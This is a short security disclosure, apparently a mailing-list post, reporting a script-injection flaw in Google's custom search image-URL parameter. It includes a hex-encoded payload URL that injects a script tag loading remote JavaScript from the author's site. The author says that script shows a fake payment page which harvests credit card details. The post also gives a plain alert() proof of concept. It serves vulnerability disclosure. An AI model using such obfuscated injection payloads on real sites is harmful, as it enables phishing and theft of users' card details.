Google Script Insertion Exploit

[Jim Ley <jim@xxxxxxxxxxxxx>]

Website:  www.google.com

Description:  Google's custom websearch does not prevent javascript from 
being inserted into the url of the image, allowing malicious users to modify 
the content of the google page allowing in phishing attacks, or silently 
steal search terms/results/clicks or modify actual searches to always 
contain controlled results.  With Googles trusted status, the risk is almost 
certainly high.

The exploit is easiest to produce through a custom google search form which 
are commonly seen, used and understood on the web, but you can also do it 
through a simple link, this one works in IE:

http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75%6d%65%6e%74%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%74%65%73%74%32%2e%6a%73%27

(This is an example of using the exploit for phishing, it changes the google 
search page to a page informing the user, that google is now a chargeable 
service and they should enter their credit card details to continue, these 
are then logged on my site and the user is returned to a working google - 
currently there's an confirm box warning the user before the form is 
submitted.)

This example only works in IE, but other UA's also execute the javascript - 
it being a Google vulnerability, not an IE one.

The exploit can be simply demonstrated with, the simpler url:

http://www.google.com/custom?cof=L:javascript:javascript:alert('EEK!')

The exploit has been public for over 2 years, and google have been informed 
on multiple occasions.

More information, and another example exploit at 
http://jibbering.com/2004/10/google.html

Jim Ley.

http://jibbering.com/